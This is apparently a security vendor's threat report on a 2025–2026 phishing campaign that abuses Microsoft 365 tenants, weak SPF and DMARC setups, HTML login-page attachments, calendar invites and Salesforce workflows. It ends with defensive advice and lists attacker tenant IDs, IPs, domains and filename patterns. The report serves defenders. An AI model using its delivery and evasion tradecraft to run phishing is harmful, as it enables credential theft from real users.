Phishing attacks are no longer confined to the inbox.
By combining legitimate Microsoft 365 infrastructure, HTML-based credential harvesting, and calendar invite abuse, this campaign achieves high delivery success and multiple opportunities for user interaction.
Notably, this activity was also observed propagating through Salesforce workflows, introducing a trusted business context that can further reduce user suspicion.
Key takeaways
- Attackers leveraged Microsoft 365 infrastructure to improve phishing email deliverability
- HTML attachments delivered credential-harvesting pages impersonating Microsoft services
- Calendar invites (ICS files) introduced a secondary interaction channel
- The campaign was observed within Salesforce workflows, where business context increases user trust
- The attack relies on abusing trusted platforms and user interaction rather than exploiting vulnerabilities
Timeframe and Scope
The earliest confirmed activity dates to September 2025, with the campaign still active as of today, 17 April 2026.
Most observed telemetry is concentrated in US-based organizations, with additional activity identified across Europe and other regions. Target organizations span multiple sectors, including legal services, financial services, manufacturing, education, and consumer goods.
The distribution of targets suggests an opportunistic campaign, rather than one focused on specific industries or geographies.
Social engineering lures
The campaign uses multiple convincing themes:
Domain expiry / renewal failure — urgent warnings of service disruption
Microsoft subscription payment failure — billing issues affecting service continuity
Payroll report delivery — impersonation of internal payroll communications
SharePoint file sharing — fake collaboration requests
Academic invitations — targeted institutional messaging
Example phishing email
Example phishing email
These lures rely on urgency or contextual authority to drive immediate action.
Email authentication evasion
The campaign achieves delivery by operating within the constraints of email authentication rather than bypassing them outright.
The sending domains were configured with the following SPF record:
v=spf1 include:spf.protection.outlook.com ~all
This configuration has several implications:
- Microsoft 365 infrastructure is explicitly authorized to send on behalf of the domain
- The ~all (softfail) policy allows messages to proceed even if SPF checks fail
- No DMARC policy is defined, leaving enforcement to receiving systems
This is the SPF result for one of the sender IP observed in the email headers:
Sender IP (146.20.65.91) fails SPF authentication for the domain, yet the email was still delivered due to the softfail policy and DKIM pass.
In observed samples, the sending IP failed SPF validation, but the message was still delivered because:
- DKIM validation succeeded (the attacker controls the signing domain)
- No DMARC policy enforced rejection
- Composite authentication results appeared acceptable to filtering systems
This shows that passing authentication checks does not indicate legitimacy. It only means that the message conforms to the authentication model.
M365 Tenant Abuse
The phishing emails were routed through Microsoft 365 tenant infrastructure.
Attackers likely registered or acquired tenants via free trials, compromised accounts, or underground markets, and used them to send messages through legitimate Microsoft infrastructure.
Microsoft-generated header fields observed in the emails identify the authenticated tenant associated with the sending session. These fields are written by Microsoft systems and cannot be forged externally, confirming the use of genuine tenant infrastructure.
Example Tenant ID used by threat actor
Email attachments: dual delivery approach
Each phishing email contains two attachments:
- HTML file — primary credential harvesting payload
- iCalendar (.ics) file — secondary delivery vector
This dual-delivery approach increases resilience against single-channel defenses and creates multiple interaction paths for the recipient.
HTML Attachment: Credential Harvester
The HTML attachment presents a fake Microsoft login experience.
When opened, it:
- Displays a Microsoft-branded loading sequence
- Dynamically generates attacker-controlled subdomains
- Loads a phishing interface designed to capture credentials
Fake loading process
Fake loading process
Fake login prompt
Fake login prompt
In addition to generic Microsoft-themed pages, some HTML attachments are tailored to specific scenarios, including domain renewal or subscription notices impersonating providers such as GoDaddy.
Fake GoDaddy login page
This phishing kit also tracks user interaction by issuing requests to attacker-controlled endpoints over non-standard ports (e.g., 8443, 2083), using URL paths such as /impact and /track-click. This allows the operators to monitor engagement and potentially tailor subsequent stages of the attack.
Tracking endpoint URL format
Tracking endpoint URL format
Calendar Invite: Secondary Delivery Vector
The iCalendar (.ics) attachment is delivered as a meeting request.
Because ICS is widely supported across platforms (Outlook, Google Calendar, Apple Calendar, and mobile clients), it provides a reliable cross-platform delivery mechanism.
Depending on email client behavior and configuration:
- Events may be automatically added to the calendar
- Events may appear upon preview or interaction
- Users may engage without explicitly accepting the invite
Calendar invite
Calendar invite added to calendar
The ICS attachment itself does not contain executable malicious content. Instead, it functions as a social engineering and delivery mechanism, guiding the user toward the phishing payload.
Observed in Salesforce workflows
We have observed this campaign within Salesforce workflows. This is significant because Salesforce operates within a trusted business context, where users expect legitimate operational content. Content appearing in CRM workflows aligns with expected business activity, which can reduce user skepticism.
In this context:
- Phishing content appears consistent with legitimate workflows (e.g., invoices, payroll, document sharing)
- The delivery channel reinforces perceived legitimacy
- The attack may fall outside traditional email-focused threat models
The phishing payload itself behaves the same regardless of delivery channel. However, delivery through Salesforce increases the likelihood of user interaction due to contextual trust.
Detection
WithSecure Cloud Protection for Salesforce detects the malicious HTML attachments associated with this campaign as PHISH/HTML.Agent.
This detection targets credential-harvesting pages that:
- Dynamically generate attacker-controlled URLs
- Impersonate Microsoft authentication portals
- Capture user credentials
Conclusion
This campaign demonstrates how attackers increasingly operate within trusted systems rather than attempting to evade them directly.
This approach reduces reliance on traditional evasion techniques and instead exploits trust in widely adopted platforms.
By combining these techniques, the attackers create messages that appear technically legitimate:
- Legitimate Microsoft 365 infrastructure
- Weak or absent DMARC enforcement
- Valid DKIM signatures
- Multi-channel delivery (email and calendar)
The observation of this activity within Salesforce workflows highlights a broader shift: Phishing threats are no longer limited to email. They are extending into business applications where users inherently trust the context.
As attackers continue to leverage trusted platforms and workflows, organizations that focus solely on email security risk overlooking exposure in systems that are deeply embedded in day-to-day operations.
Recommendations
- Treat urgent service-related emails and calendar invites with caution
- Avoid opening HTML attachments claiming to be Microsoft login portals
- Access Microsoft services directly via official domains
- Review calendar auto-acceptance settings
- Do not rely solely on SPF/DKIM/DMARC results as indicators of trust
Indicators of compromise
The following indicators were identified through analysis of the campaign samples.
Note that infrastructure indicators (IPs, domains, tenant IDs) are subject to rotation by the attackers.
- M365 Tenant IDs:
- 6449efea-a175-42ba-b4fe-aaf702600f14
- 7c8f16fe-b88a-438e-850b-cc8160aefa6d
- d87ee9b3-0568-4108-9977-1462d082e09b
- 0714db3d-882f-41c4-8579-3146af5c2abb
- IP addresses:
- 146.20.65.91
- 146.20.87.4
- 31.58.144.13
- Domains:
- anaksakti77[.]org
- touchepasamonflic[.]fr
- klinikdrdewi[.]com
- haoranchalerkotha[.]com
- khaskhoborbd[.]com
- bhkbbmta110[.]com
- cash4d10[.]xyz
- blitz168asia[.]com
- blitz168app[.]com
- walshmanagement[.]ca
- doctorsbusinesshub[.]com
- anaksakti[.]online
- automedsos[.]com
- richalfahad[.]com
- bishalacademy[.]com
- uttarabusinessclub[.]com
- cloudeducation[.]xyz
- nexgenictchampsolympiad[.]com
- 102naga26[.]com
- igromaster[.]info
- n8nblitz[.]sbs
- waroengindo89[.]com
- ytccomputer[.]com
- css.nokhbabd[.]com
- Filename patterns:
- Admin_Center_MSA[username]_[digits]_.htm
- Admin_Center_[name]_[digits]_.htm
- Online admin center [random].PDF.HTM
- SharePoint_Workspace_Team_review, [timestamp]-[digits].htm
- Ms-Portal-SupportHub_[encoded].htm
- TUlNRS1WZXJzaW9uOiAxLjAKQ29udGVudC1UeXBlOiB0ZXh0L2h0bWw (base64 decodes to “MIME-Version: 1.0\nContent-Type: text/html”)
- Remittance_Review_[string].htm
- PayOps Asset Ltd – RTI Full Payment Submission (FPS) for [month]_[random].htm
- ABH Asset Ltd – RTI Full Payment Submission (FPS) for [month]_[random].htm